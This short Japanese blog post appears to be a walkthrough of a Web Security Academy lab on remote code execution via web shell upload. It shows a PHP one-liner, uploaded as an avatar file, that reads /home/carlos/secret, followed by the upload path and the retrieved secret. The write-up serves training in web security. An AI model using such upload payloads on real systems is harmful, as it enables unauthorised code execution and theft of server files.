Hello there, ('ω')ノ

 

Webシェルアップロードによるリモートコード実行を。

まずは、ログインして。

 

 

テスト用の悪意のあるファイルを作成しておいてからアップロードして。

exploit.php

　<?php echo file_get_contents('/home/carlos/secret'); ?>

 

 

正常にavatarsの下にアップロードできたようで。

 

 

ソースコードからどこにアップロードされたかを確認して。

　/files/avatars/exploit.php

 

 

アップロードされたファイルに直接アクセスするとPHPが実行されて。

　https://aca41fec1ef0e0fbc03ff741004f009f.web-security-academy.net/files/avatars/exploit.php

 

 

取得したコードを入力すると。

　mHtjk1Weh4weDq7xyCMXSrtwONX05CKt

 

 

クリアできて。

 

 

Best regards, (^^ゞ